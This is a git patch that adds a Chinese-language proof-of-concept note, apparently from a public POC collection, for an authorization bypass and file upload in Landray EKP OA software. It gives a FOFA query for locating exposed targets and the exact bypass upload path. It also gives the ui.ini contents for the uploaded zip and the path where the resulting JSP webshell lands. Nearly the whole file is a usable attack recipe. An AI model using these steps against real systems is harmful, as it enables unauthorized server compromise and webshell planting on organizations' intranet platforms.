From eddef063cc3f6834c3e479ce23a483e9db755a07 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 12 Dec 2023 19:58:14 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=93=9D=E5=87=8CEKP=E5=89=8D?=
 =?UTF-8?q?=E5=8F=B0=E6=8E=88=E6=9D=83=E7=BB=95=E8=BF=87=E5=AF=BC=E8=87=B4?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 蓝凌EKP前台授权绕过导致文件上传.md | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 蓝凌EKP前台授权绕过导致文件上传.md

diff --git a/蓝凌EKP前台授权绕过导致文件上传.md b/蓝凌EKP前台授权绕过导致文件上传.md
new file mode 100644
index 0000000..d086d06
--- /dev/null
+++ b/蓝凌EKP前台授权绕过导致文件上传.md
@@ -0,0 +1,30 @@
+
+## 蓝凌EKP前台授权绕过导致文件上传
+
+
+## fofa
+```
+app="Landray-OA系统"
+```
+
+访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。
+
+## poc
+```
+/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/47bd374a-d072-46ab-824e-e23ef8d08a69)
+
+
+## 文件上传
+然后上传zip包需要有ui.ini文件内容如下
+```
+id=ZzzZname=testthumb=test
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/1d6615f9-a98b-4747-a6a8-9e6bdd3218c0)
+
+![image](https://github.com/wy876/POC/assets/139549762/1cb1a160-309f-44bb-b0d3-03e59b163258)
+
+马会在/resource/ui-ext/ZzzZ/jmdyy.jsp